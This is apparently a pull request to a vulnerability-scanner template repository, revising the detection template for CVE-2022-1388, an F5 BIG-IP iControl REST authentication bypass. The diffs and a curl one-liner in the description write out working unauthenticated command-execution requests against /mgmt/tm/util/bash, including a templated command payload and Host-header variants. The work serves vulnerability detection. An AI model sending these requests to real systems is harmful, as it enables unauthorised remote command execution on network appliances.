### PR TITLE
Update CVE-2022-1388.yaml

### DIFF
--- a/cves/2022/CVE-2022-1388.yaml
+++ b/cves/2022/CVE-2022-1388.yaml
@@ -35,7 +35,6 @@ requests:
         X-F5-Auth-Token: a
         Authorization: Basic {{base64(auth)}}
         Content-Type: application/json
-
         {
           "command": "run",
           "utilCmdArgs": "-c id"
@@ -46,7 +45,6 @@ requests:
           - "commandResult"
           - "uid="
         condition: and
-        
   - raw:
       - |
         POST /mgmt/tm/util/bash HTTP/1.1
@@ -55,7 +53,6 @@ requests:
         X-F5-Auth-Token: a
         Authorization: Basic {{base64(auth)}}
         Content-Type: application/json
-
         {
           "command": "run",
           "utilCmdArgs": "-c id"
@@ -74,7 +71,6 @@ requests:
         X-F5-Auth-Token: a
         Authorization: Basic {{base64(auth)}}
         Content-Type: application/json
-
         {
           "command": "run",
           "utilCmdArgs": "-c id"

--- a/cves/2022/CVE-2022-1388.yaml
+++ b/cves/2022/CVE-2022-1388.yaml
@@ -1,18 +1,17 @@
 id: CVE-2022-1388
 
 info:
-  name: F5 BIG-IP iControl REST Auth Bypass RCE
+  name: F5 BIG-IP iControl - REST Auth Bypass RCE
   author: dwisiswant0,Ph33r
   severity: critical
   description: |
-    This vulnerability may allow an unauthenticated attacker
+    This F5 BIG-IP vulnerability can allow an unauthenticated attacker
     with network access to the BIG-IP system through the management
-    port and/or self IP addresses to execute arbitrary system commands,
-    create or delete files, or disable services. There is no data plane
-    exposure; this is a control plane issue only.
+    port and/or self IP addresses to execute arbitrary system commands.
   reference:
     - https://twitter.com/GossiTheDog/status/1523566937414193153
     - https://support.f5.com/csp/article/K23605346
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.80
@@ -21,63 +20,86 @@ info:
   metadata:
     shodan-query: http.title:"BIG-IP&reg;-+Redirect" +"Server"
     verified: true
-  tags: bigip,cve,cve2022,rce,mirai
+  tags: f5,bigip,cve,cve2022,rce,mirai
 
 variables:
   auth: "admin:"
 
 requests:
   - raw:
-      - |
+      - |+
         POST /mgmt/tm/util/bash HTTP/1.1
         Host: {{Hostname}}
         Connection: keep-alive, X-F5-Auth-Token
         X-F5-Auth-Token: a
         Authorization: Basic {{base64(auth)}}
         Content-Type: application/json
+
         {
-          "command": "run",
-          "utilCmdArgs": "-c id"
+             "command": "run",
+             "utilCmdArgs": "-c id"
         }
+
+    matchers-condition: and
     matchers:
       - type: word
         words:
-          - "commandResult"
           - "uid="
         condition: and
+      - type: word
+        words:
+          - "context=system_u"
+          - "commandResult"
+        condition: or
+
   - raw:
-      - |
+      - |+
         POST /mgmt/tm/util/bash HTTP/1.1
         Host: localhost
         Connection: keep-alive, X-F5-Auth-Token
         X-F5-Auth-Token: a
         Authorization: Basic {{base64(auth)}}
         Content-Type: application/json
+
         {
           "command": "run",
           "utilCmdArgs": "-c id"
         }
+
+    matchers-condition: and
     matchers:
       - type: word
         words:
-          - "commandResult"
           - "uid="
         condition: and
+      - type: word
+        words:
+          - "context=system_u"
+          - "commandResult"
+        condition: or
+
   - raw:
-      - |
+      - |+
         POST /mgmt/tm/util/bash HTTP/1.1
         Host: localhost:8100
         Connection: keep-alive, X-F5-Auth-Token
         X-F5-Auth-Token: a
         Authorization: Basic {{base64(auth)}}
         Content-Type: application/json
+
         {
           "command": "run",
           "utilCmdArgs": "-c id"
         }
+
+    matchers-condition: and
     matchers:
       - type: word
         words:
-          - "commandResult"
           - "uid="
         condition: and
+      - type: word
+        words:
+          - "context=system_u"
+          - "commandResult"
+        condition: or

--- a/cves/2022/CVE-2022-1388.yaml
+++ b/cves/2022/CVE-2022-1388.yaml
@@ -27,7 +27,7 @@ variables:
 
 requests:
   - raw:
-      - |+
+      - |
         POST /mgmt/tm/util/bash HTTP/1.1
         Host: {{Hostname}}
         Connection: keep-alive, X-F5-Auth-Token

--- a/cves/2022/CVE-2022-1388.yaml
+++ b/cves/2022/CVE-2022-1388.yaml
@@ -37,22 +37,9 @@ requests:
 
         {
              "command": "run",
-             "utilCmdArgs": "-c id"
+             "utilCmdArgs": "-c '{{cmd}}'"
         }
 
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "uid="
-        condition: and
-      - type: word
-        words:
-          - "context=system_u"
-          - "commandResult"
-        condition: or
-
-  - raw:
       - |
         POST /mgmt/tm/util/bash HTTP/1.1
         Host: localhost
@@ -62,44 +49,20 @@ requests:
         Content-Type: application/json
 
         {
-          "command": "run",
-          "utilCmdArgs": "-c id"
+             "command": "run",
+             "utilCmdArgs": "-c '{{cmd}}'"
         }
 
+    payloads:
+      cmd:
+        - 'echo CVE-2022-1388 | rev'
+
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
-          - "uid="
-        condition: and
-      - type: word
-        words:
-          - "context=system_u"
           - "commandResult"
-        condition: or
-
-  - raw:
-      - |
-        POST /mgmt/tm/util/bash HTTP/1.1
-        Host: localhost:8100
-        Connection: keep-alive, X-F5-Auth-Token
-        X-F5-Auth-Token: a
-        Authorization: Basic {{base64(auth)}}
-        Content-Type: application/json
-
-        {
-          "command": "run",
-          "utilCmdArgs": "-c id"
-        }
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "uid="
+          - "8831-2202-EVC"
         condition: and
-      - type: word
-        words:
-          - "context=system_u"
-          - "commandResult"
-        condition: or

--- a/cves/2022/CVE-2022-1388.yaml
+++ b/cves/2022/CVE-2022-1388.yaml
@@ -10,6 +10,7 @@ info:
     port and/or self IP addresses to execute arbitrary system commands.
   reference:
     - https://twitter.com/GossiTheDog/status/1523566937414193153
+    - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
     - https://support.f5.com/csp/article/K23605346
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
   classification:

--- a/cves/2022/CVE-2022-1388.yaml
+++ b/cves/2022/CVE-2022-1388.yaml
@@ -2,7 +2,7 @@ id: CVE-2022-1388
 
 info:
   name: F5 BIG-IP iControl REST Auth Bypass RCE
-  author: dwisiswant0
+  author: dwisiswant0,Ph33r
   severity: critical
   description: |
     This vulnerability may allow an unauthenticated attacker
@@ -40,7 +40,45 @@ requests:
           "command": "run",
           "utilCmdArgs": "-c id"
         }
+    matchers:
+      - type: word
+        words:
+          - "commandResult"
+          - "uid="
+        condition: and
+        
+  - raw:
+      - |
+        POST /mgmt/tm/util/bash HTTP/1.1
+        Host: localhost
+        Connection: keep-alive, X-F5-Auth-Token
+        X-F5-Auth-Token: a
+        Authorization: Basic {{base64(auth)}}
+        Content-Type: application/json
 
+        {
+          "command": "run",
+          "utilCmdArgs": "-c id"
+        }
+    matchers:
+      - type: word
+        words:
+          - "commandResult"
+          - "uid="
+        condition: and
+  - raw:
+      - |
+        POST /mgmt/tm/util/bash HTTP/1.1
+        Host: localhost:8100
+        Connection: keep-alive, X-F5-Auth-Token
+        X-F5-Auth-Token: a
+        Authorization: Basic {{base64(auth)}}
+        Content-Type: application/json
+
+        {
+          "command": "run",
+          "utilCmdArgs": "-c id"
+        }
     matchers:
       - type: word
         words:


### PR DESCRIPTION
### Template / PR Information
add more POC 

for   "401 F5 Authorization Required" error we need to use host: localhost or localhost:8100 

req:

```curl -X POST https:///mgmt/tm/util/bash -H "X-F5-Auth-Token: a" -H "Authorization: Basic YWRtaW46" -d '{ "command":"run", "utilCmdArgs":"-c  id" }' -H "Connection: keep-alive,X-F5-Auth-Token" -H "Content-Type: application/json" --insecure -v```

resp:
"{"code":401,"message":"Authorization failed: no user authentication header or token detected."

